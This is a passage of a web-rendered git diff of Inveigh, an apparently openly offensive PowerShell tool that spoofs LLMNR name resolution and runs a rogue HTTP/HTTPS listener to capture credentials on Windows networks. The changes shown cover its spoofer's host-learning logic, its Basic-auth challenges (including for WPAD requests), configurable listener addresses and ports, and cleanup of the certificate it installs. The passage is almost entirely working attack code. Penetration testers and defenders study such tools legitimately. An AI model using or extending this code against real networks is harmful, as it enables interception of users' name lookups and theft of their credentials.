- elseif(($HTTPAuth -eq 'Basic' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $inveigh.request.RawUrl -match '/wpad.dat'))
+ elseif(($HTTPAuth -eq 'Basic' -and $HTTP_request_raw_url -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $HTTP_request_raw_url -match '/wpad.dat'))
{
$inveigh.response.AddHeader("WWW-Authenticate","Basic realm=$HTTPBasicRealm")
}
@@ -1775,7 +1912,7 @@ $sniffer_scriptblock =
if($LLMNR -eq 'Y')
{
- if($SpooferLearning -eq 'Y' -and $inveigh.valid_host_list -contains $LLMNR_query_string -and $source_IP -ne $IP)
+ if($SpooferLearning -eq 'Y' -and $inveigh.valid_host_list -notcontains $LLMNR_query_string -and $source_IP -ne $IP)
{
if(($LLMNR_learning_log.Exists({param($s) $s -like "20* $LLMNR_query_string"})))
@@ -1815,7 +1952,7 @@ $sniffer_scriptblock =
$LLMNR_learning_destination_endpoint = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.252",5355)
$LLMNR_UDP_client.Connect($LLMNR_learning_destination_endpoint)
$LLMNR_UDP_client.Send($LLMNR_request_packet,$LLMNR_request_packet.Length)
- $LLMNR_UDP_client_port = ($LLMNR_UDP_client.Client.LocalEndPoint).Port
+ #$LLMNR_UDP_client_port = ($LLMNR_UDP_client.Client.LocalEndPoint).Port
$LLMNR_UDP_client.Close()
$LLMNR_learning_log.Add("$(Get-Date -format 's') $LLMNR_transaction_ID $LLMNR_query_string")
$inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")
@@ -1957,31 +2094,43 @@ $sniffer_scriptblock =
if($inveigh.HTTPS)
{
- & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
-
- try
+ $certificate_check = & "netsh" http show sslcert
+
+ if($certificate_check)
{
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$false)[0]
- $certificate_store.Remove($certificate)
- $certificate_store.Close()
+ $netsh_ipport = "ipport=" + $inveigh.HTTPS_IP + ":" + $inveigh.HTTPS_port
+ $netsh_arguments = @("http","delete","sslcert",$netsh_ipport)
+ & "netsh" $netsh_arguments > $null
}
- catch
+
+ if(!$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
{
- if($inveigh.status_output)
+ try
{
- $inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually")
- }
+ $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+ $certificate_store.Open('ReadWrite')
+ $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
+ ForEach($certificate in $certificates)
+ {
+ $certificate_store.Remove($certificate)
+ }
- if($inveigh.file_output)
+ $certificate_store.Close()
+ }
+ catch
{
- "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
+ Write-Output("SSL Certificate Deletion Error - Remove Manually")
+ $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
+
+ if($inveigh.file_output)
+ {
+ "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
+ }
+
}
-
+
}
}
@@ -2034,14 +2183,34 @@ function HTTPListener()
{
$inveigh.HTTP_listener = New-Object System.Net.HttpListener
- if($inveigh.HTTP)
+ if($HTTP -eq 'Y')
{
- $inveigh.HTTP_listener.Prefixes.Add('http://*:80/')
+
+ if($HTTPIP -eq '0.0.0.0')
+ {
+ $HTTP_prefix = "http://*:$HTTPPort/"
+ }
+ else
+ {
+ $HTTP_prefix = "http://$HTTPIP`:$HTTPPort/"
+ }
+
+ $inveigh.HTTP_listener.Prefixes.Add($HTTP_prefix)
}
- if($inveigh.HTTPS)
+ if($HTTPS -eq 'Y')
{
- $inveigh.HTTP_listener.Prefixes.Add('https://*:443/')
+
+ if($HTTPIP -eq '0.0.0.0')
+ {
+ $HTTPS_prefix = "https://*:$HTTPSPort/"
+ }
+ else
+ {
+ $HTTPS_prefix = "https://$HTTPIP`:$HTTPSPort/"
+ }
+
+ $inveigh.HTTP_listener.Prefixes.Add($HTTPS_prefix)
}
$inveigh.HTTP_listener.AuthenticationSchemes = "Anonymous"
@@ -2082,7 +2251,7 @@ function SnifferSpoofer()
# Startup Enabled Services
# HTTP Server Start
-if($inveigh.HTTP -or $inveigh.HTTPS)
+if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
{
HTTPListener
}
@@ -2292,7 +2461,7 @@ if($inveigh)
if($inveigh.unprivileged_running)
{
$inveigh.unprivileged_running = $false
- Start-Sleep -s 5
+ Start-Sleep -S 2
Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')")
$inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null
@@ -2306,6 +2475,7 @@ if($inveigh)
if($inveigh.relay_running)
{
$inveigh.relay_running = $false
+ Start-Sleep -S 2
Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
$inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
@@ -2337,27 +2507,45 @@ if($inveigh)
if($inveigh.HTTPS)
{
- & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
+ $certificate_check = & "netsh" http show sslcert
- try
+ if($certificate_check)
{
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0]
- $certificate_store.Remove($certificate)
- $certificate_store.Close()
+ $netsh_ipport = "ipport=" + $inveigh.HTTPS_IP + ":" + $inveigh.HTTPS_port
+ $netsh_arguments = @("http","delete","sslcert",$netsh_ipport)
+ & "netsh" $netsh_arguments > $null
}
- catch
+
+ if(!$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
{
- Write-Output("SSL Certificate Deletion Error - Remove Manually")
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
- if($inveigh.file_output)
+ try
+ {
+ $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+ $certificate_store.Open('ReadWrite')
+ $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
+
+ ForEach($certificate in $certificates)
+ {
+ $certificate_store.Remove($certificate)
+ }
+
+ $certificate_store.Close()
+ }
+ catch
{
- "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
+ Write-Output("SSL Certificate Deletion Error - Remove Manually")
+ $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
+
+ if($inveigh.file_output)
+ {
+ "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
+ }
+
}
}
+
}
$inveigh.HTTP = $false
@@ -2368,7 +2556,7 @@ else
Write-Output("There are no running Inveigh functions")|Out-Null
}
-}
+}
function Get-Inveigh
{
diff --git a/inveigh.pfx b/inveigh.pfx
deleted file mode 100644
index 75a4a60..0000000
--- a/inveigh.pfx
+++ /dev/null
Binary files differ
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-25 19:55:21 +0000